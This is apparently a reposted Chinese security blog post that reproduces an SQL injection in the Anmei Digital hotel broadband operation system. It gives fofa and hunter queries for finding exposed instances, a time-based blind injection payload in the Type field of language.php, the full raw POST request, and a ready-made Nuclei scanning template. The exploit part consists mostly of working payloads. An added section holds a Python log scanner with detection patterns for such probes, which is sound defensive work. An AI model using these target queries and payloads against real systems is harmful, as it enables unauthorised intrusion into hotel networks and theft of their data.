[Vulnerability Reproduction] Anmei Digital (安美数字) Hotel Broadband Operation System SQL Injection Vulnerability

admin, 2024-02-16 11:25:20

Asset discovery

hunter: web.title="酒店宽带运营系统"
fofa: title="酒店宽带运营系统"

Page appearance


Vulnerability reproduction

  1. Access language.php.

  2. The payload is as follows:

EditStatus=2&LangEName=pHqghUme&LangID=1&LangName=pHqghUme&LangType=0000%E7%B3%BB%E7%BB%9F%E5%9F%BA%E6%9C%AC%E4%BF%A1%E6%81%AF&Lately=555-666-0606&Search=the&SerialID=1&Type=0'XOR(if(now()=sysdate()%2Csleep(2)%2C0))XOR'Z&UID=add&submit=%20%E6%B7%BB%20%E5%8A%A0%20

The full request is as follows:

POST /language.php HTTP/1.1
Host: xxxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Content-Type: application/x-www-form-urlencoded
Content-Length: 264

EditStatus=2&LangEName=pHqghUme&LangID=1&LangName=pHqghUme&LangType=0000%E7%B3%BB%E7%BB%9F%E5%9F%BA%E6%9C%AC%E4%BF%A1%E6%81%AF&Lately=555-666-0606&Search=the&SerialID=1&Type=0'XOR(if(now()=sysdate()%2Csleep(2)%2C0))XOR'Z&UID=add&submit=%20%E6%B7%BB%20%E5%8A%A0%20
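For defenders, the following added example (not part of the original article) scans logged form bodies for the pattern used in the request above: a quote breakout combined with a delay function. It then compares the observed response time with the requested delay, the same signal a timing-based check relies on. The record layout (`path`, `body`, `seconds`) and the sample records are assumptions constructed for illustration; it presumes a proxy or WAF that logs POST bodies and response times.

```python
import re
from urllib.parse import parse_qsl

# Delay primitives used by time-based blind SQL injection probes.
DELAY_CALL = re.compile(r"\b(?:sleep|benchmark|pg_sleep)\s*\(|\bwaitfor\s+delay\b", re.I)
# Quote that closes a string literal, followed directly by a logical operator.
QUOTE_BREAKOUT = re.compile(r"'\s*(?:xor|or|and)\b|'\s*(?:\|\||&&)", re.I)
SLEEP_ARG = re.compile(r"\bsleep\s*\(\s*(\d+(?:\.\d+)?)\s*\)", re.I)

def flag_params(body):
    """Return {field: decoded_value} for form fields matching both patterns."""
    return {
        name: value
        for name, value in parse_qsl(body, keep_blank_values=True)
        if DELAY_CALL.search(value) and QUOTE_BREAKOUT.search(value)
    }

def triage(records):
    """Classify each flagged request as 'probe' or 'likely-vulnerable'."""
    alerts = []
    for rec in records:
        for field, value in flag_params(rec["body"]).items():
            m = SLEEP_ARG.search(value)
            wanted = float(m.group(1)) if m else None
            # A response at least as slow as the requested delay suggests the
            # injected expression was evaluated by the database.
            hit = wanted is not None and rec["seconds"] >= wanted
            alerts.append((rec["path"], field, "likely-vulnerable" if hit else "probe"))
    return alerts

# Constructed sample records (hypothetical log layout); not real traffic.
SAMPLE = [
    {"path": "/language.php", "seconds": 2.31,
     "body": "LangID=1&Search=the&Type=0'XOR(if(now()=sysdate()%2Csleep(2)%2C0))XOR'Z&UID=add"},
    {"path": "/language.php", "seconds": 0.04,
     "body": "LangID=1&Search=the&Type=0'XOR(if(now()=sysdate()%2Csleep(2)%2C0))XOR'Z&UID=add"},
    {"path": "/language.php", "seconds": 0.05,
     "body": "LangID=1&Search=sleep+well+and+rest&Type=0&UID=add"},
]

if __name__ == "__main__":
    for alert in triage(SAMPLE):
        print(alert)
```

A "probe" result with a fast response still warrants review of the source address, since it shows the endpoint is being tested even if the delay did not take effect.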


Nuclei PoC

id: anmeishuzijiudian

info:
  name: anmeishuzijiudian
  author: xxxx
  severity: info
  description: description
  reference:
    - https://
  tags: tags

requests:
  - raw:
      - |-
        POST /language.php HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate
        Connection: close
        Upgrade-Insecure-Requests: 1
        Sec-Fetch-Dest: document
        Sec-Fetch-Mode: navigate
        Sec-Fetch-Site: none
        Sec-Fetch-User: ?1
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 264

        EditStatus=2&LangEName=pHqghUme&LangID=1&LangName=pHqghUme&LangType=0000%E7%B3%BB%E7%BB%9F%E5%9F%BA%E6%9C%AC%E4%BF%A1%E6%81%AF&Lately=555-666-0606&Search=the&SerialID=1&Type=0'XOR(if(now()=sysdate()%2Csleep(2)%2C0))XOR'Z&UID=add&submit=%20%E6%B7%BB%20%E5%8A%A0%20

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'duration>=2'
      - type: status
        status:
          - 200

Nuclei verification


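Originally published on the WeChat official account 零点安全团队: [Vulnerability Reproduction] Anmei Digital (安美数字) Hotel Broadband Operation System SQL Injection Vulnerability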

When reposting, please keep the link to this article (CN-SEC中文网: thanks to the original author for their hard work): https://cn-sec.com/archives/2227279.html
